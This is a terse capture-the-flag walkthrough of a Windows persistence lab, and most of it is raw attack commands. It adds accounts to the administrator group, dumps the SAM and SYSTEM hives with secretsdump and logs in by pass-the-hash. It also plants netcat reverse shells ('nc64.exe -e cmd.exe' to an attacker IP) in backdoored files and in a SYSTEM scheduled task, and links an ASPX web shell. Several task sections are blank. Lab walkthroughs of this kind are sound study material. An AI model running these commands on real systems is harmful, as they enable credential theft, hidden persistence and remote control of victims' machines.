Windows Local Persistence
March 16, 2024
Task 1: Introduction

Task 2: Tampering With Unprivileged Accounts
For the flag1
net localgroup administrators thmuser0 /add
net localgroup "Backup Operators" thmuser1 /add
net localgroup "Remote Management Users" thmuser1 /add
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
whoami /groups
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
evil-winrm -i 10.10.112.102 -u thmuser1 -p Password321
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
ls
python3 ~/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
ruby evil-winrm.rb -i 10.10.112.102 -u Administrator -H f3118544a831e728781d780cfdb9c1fa

For the flag 2
secedit /export /cfg config.inf
notepad config.inf
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
netuser thmuser2
ruby evil-winrm.rb -i 10.10.112.102 -u thmuser2 -p Password321
For the flag3
wmic useraccount get name,sid
cd /tools/pstools
dir
PsExec64.exe -i -s regedit

.\flag3.exe
whoami
Task 3: Backdooring Files

For the first flag on this task
cd /Windows/System32
notepad backdoor.ps1
```
Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe 10.9.193.229 4445"
C:\Windows\System32\calc.exe
```


For the second flag of this task


Start-Process -NoNewWindow "c:\tools\nc64.exe" "-e cmd.exe ATTACKER_IP 4448"
C:\Windows\system32\NOTEPAD.EXE $args[0]


Task 4: Abusing Services
For the first flag for this task



For the second flag of this task




Task 5: Abusing Scheduled Tasks
schtasks /create /sc minute /mo 1 /tn THM-TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe 10.9.193.229 4449" /ru SYSTEM
schtasks /query /tn thm-taskbackdoor
cd /tools/pstools
./PsExec64.exe -s -i regedit

schtasks /query /tn thm-taskbackdoor

Task 6: Local Triggered Persistence
For the first flag of this task





For the second flag of this task



PS. Change the name from MyBackdooooooor to MyBackdoor since the task needs the name correctly


For the third flag of this task





For the fourth flag of this task




Task 7: Backdooring the Login Screen / RDP



For the second flag of this task


Just click the ease of access

Task 8: Persisting Through Existing Services
Download the rev shell here
https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmdasp.aspx






For the second flag of this task






Last updated